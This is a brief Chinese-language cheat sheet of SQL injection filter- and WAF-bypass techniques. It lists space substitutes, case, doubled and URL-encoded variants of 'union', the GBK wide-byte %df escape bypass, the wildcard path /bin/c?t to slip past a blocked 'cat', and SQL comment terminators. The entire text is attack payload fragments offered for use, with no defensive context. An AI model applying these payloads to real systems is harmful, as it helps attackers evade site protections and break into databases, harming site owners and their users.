sql注入绕过姿势

目录

  1. 空格绕过
  2. 关键字绕过
  3. 注释

0x001注入绕过

1.空格绕过:

在注入过程中,空格被过滤了,那么可以使用其他代替空格进行绕过,下面都可以替代空格尝试;

tab

/**/ 

/*!union*/

/*!50000union*/

%0a %0b(垂直tab) %0c %0d

%20

%2520

 

2.关键字绕过(下面代替关键字的方式绕过):

大小写:uNion UnION UNion UNION 

双写:ununionion 可用

url编码:union编码后为%75%6E%69%6F%6E

    union部分编码u%6eion

    UNION->%55%4E%49%4F%4E

asp:un%%%%%ion

双编码:%2575%256E%2569%256F%256E

 

>>绕过安全设备

宽字节:unicode,gbk

php:gpc=on 特殊符号前加转义字符:\

  id=1'-->1\'

绕过:%df

  1%df'-->1%df\'-->1%df%5c'-->1運'

 

通配符绕waf:加路径

*

?

绕过cat被过滤:

/bin/c?t

 

3.注释

>>注释sql语句包含:

mssql:--

mysql:--%20

#

%23(相当于#)

-- -

--+

//

;

/**/

/*!aaa*/

你可能感兴趣的:(sql注入绕过姿势)